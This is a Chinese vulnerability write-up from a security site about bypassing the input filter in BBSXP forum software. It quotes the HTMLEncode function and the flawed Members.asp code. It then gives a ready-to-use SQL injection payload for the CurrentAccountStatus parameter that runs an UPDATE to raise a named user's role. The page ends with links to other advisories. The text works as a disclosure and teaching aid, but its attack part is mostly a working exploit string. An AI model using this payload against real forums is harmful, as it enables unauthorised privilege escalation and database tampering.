BBSXP绕过过滤继续注入漏洞分析

所属分类: 网络安全 / 漏洞分析 阅读数: 54
收藏 0 赞 0 分享
漏洞分析:
官方最新过滤函数HTMLEncode,这次过滤了字符* ,再一次绕过过滤注射
Function HTMLEncode(fString)
fString=Replace(fString,CHR(9),"")
fString=Replace(fString,CHR(13),"")
fString=Replace(fString,CHR(22),"")
fString=Replace(fString,CHR(38),"&") '“&”
fString=Replace(fString,CHR(32)," ") '“ ”
fString=Replace(fString,CHR(34),""") '“"”
fString=Replace(fString,CHR(39),"'") '“'”
fString=Replace(fString,CHR(42),"*") '“*”
fString=Replace(fString,CHR(44),",") '“,”
fString=Replace(fString,CHR(45)&CHR(45),"--") '“--”
fString=Replace(fString,CHR(60),"<") '“<”
fString=Replace(fString,CHR(62),">") '“>”
fString=Replace(fString,CHR(92),"\") '“\”
fString=Replace(fString,CHR(59),";") '“;”
fString=Replace(fString,CHR(10),"<br>")
fString=ReplaceText(fString,"([&#])([a-z0-9]*);","$1$2;")
if SiteConfig("BannedText")<>"" then fString=ReplaceText(fString,"("&SiteConfig("BannedText")&")",string(len("&$1&"),"*"))
if IsSqlDataBase=0 then '过滤片假名(日文字符)[\u30A0-\u30FF] by yuzi
fString=escape(fString)
fString=ReplaceText(fString,"%u30([A-F][0-F])","0$1;")
fString=unescape(fString)
end if
HTMLEncode=fString
End Function
Members.asp漏洞文件作为测试:
SearchType=HTMLEncode(Request("SearchType")) //第8行
SearchText=HTMLEncode(Request("SearchText"))
SearchRole=RequestInt("SearchRole")
CurrentAccountStatus=HTMLEncode(Request("CurrentAccountStatus"))
......
if SearchText<>"" then item=item&" and ("&SearchType&" like '%"&SearchText&"%')" //第18行
......
if CurrentAccountStatus <> "" then item=item&" and UserAccountStatus="&CurrentAccountStatus&"" //第22行

if item<>"" then item=" where "&mid(item,5)
......
TotalCount=Execute("Select count(UserID) From ["&TablePrefix&"Users]"&item)(0) '获取数据数量
//第54行

看个sql语句:
select * from bbsxp_users where userid=(1)update[bbsxp_users]set[userroleid]=(1)where(username=0x79006C003600330036003400)
变量userid绕过过滤成功执行了update
同理构造:
SearchType=1
SearchText=1
CurrentAccountStatus=(1)update[bbsxp_users]set[userroleid]=(1)where(username=0x79006C003600330036003400)
更多精彩内容其他人还在看

Firebird protocol.cpp XDR协议远程内存破坏漏洞

受影响系统: Firebird Firebird SQL 2.1.0 Beta 2 Firebird Firebird SQL 2.0.3 Firebird Firebird SQL 1.5.5 Firebird Firebird SQL 1.0.3
收藏 0 赞 0 分享

Persits Software XUpload.ocx 含远程栈溢出漏洞

受影响系统: Persits XUpload 3.0.0.4 Persits XUpload 2.1.0.1 描述: XUpload是功能强大的客户端上传ActiveX控件,允许用户同时上传多个文件。 XUpload的ActiveX控件实现上存在缓
收藏 0 赞 0 分享

IrfanView FlashPix(*.fpx)文件远程堆溢出漏洞

受影响系统: IrfanView IrfanView 4.10 描述: IrfanView是一款快速、免费的图像查看器、浏览器、转换器。 IrfanView的FlashPix插件(fpx.dll)在处理FlashPix(*.fpx)文件时存在堆溢出漏洞
收藏 0 赞 0 分享

Firebird protocol.cppXDR协议远程内存破坏漏洞

受影响系统: Firebird Firebird SQL 2.1.0 Beta 2 Firebird Firebird SQL 2.0.3 Firebird Firebird SQL 1.5.5 Firebird Firebird SQL 1.0.3
收藏 0 赞 0 分享

OpenBSD DHCPD 服务程序远程栈溢出漏洞

受影响系统: OpenBSD OpenBSD 4.2 OpenBSD OpenBSD 4.1 OpenBSD OpenBSD 4.0 描述: ------------------------------------------------------
收藏 0 赞 0 分享

BitTorrent和uTorrent Peers 窗口缓冲区溢出漏洞

受影响系统: BitTorrent BitTorrent <= 6.0 (build 5535) BitTorrent uTorrent <= 1.8-alpha-7834 BitTorrent uTorrent <= 1.7.5 (build
收藏 0 赞 0 分享

GE-Fanuc CIMPLICITY w32rtr.exe 远程堆溢出漏洞

受影响系统: GE Fanuc CIMPLICITY HMI 6.1 SP6 GE Fanuc CIMPLICITY HMI 6.1 SP5 GE Fanuc CIMPLICITY HMI 6.1 不受影响系统: GE Fanuc CIMPLICITY
收藏 0 赞 0 分享

Seagull PHP Framework optimizer.php的泄露漏洞

受影响系统: Seagull PHP Framework 0.6.3 描述: Seagull是一个PHP编译框架。 Seagull在处理用户请求时存在输入验证漏洞,远程攻击者可能利用此漏洞获取文件信息。 Seagull PHP Framework的www/
收藏 0 赞 0 分享

Windows柯达图像查看器远程代码执行漏洞

受影响系统: Microsoft Windows XP SP2 Microsoft Windows Server 2003 SP2 Microsoft Windows Server 2003 SP1 Microsoft Window
收藏 0 赞 0 分享

微软 Windows RPC 认证远程拒绝服务漏洞

受影响系统: Microsoft Windows XP SP2 Microsoft Windows Vista Microsoft Windows Server 2003 SP2 Microsoft Windows Server 2
收藏 0 赞 0 分享
查看更多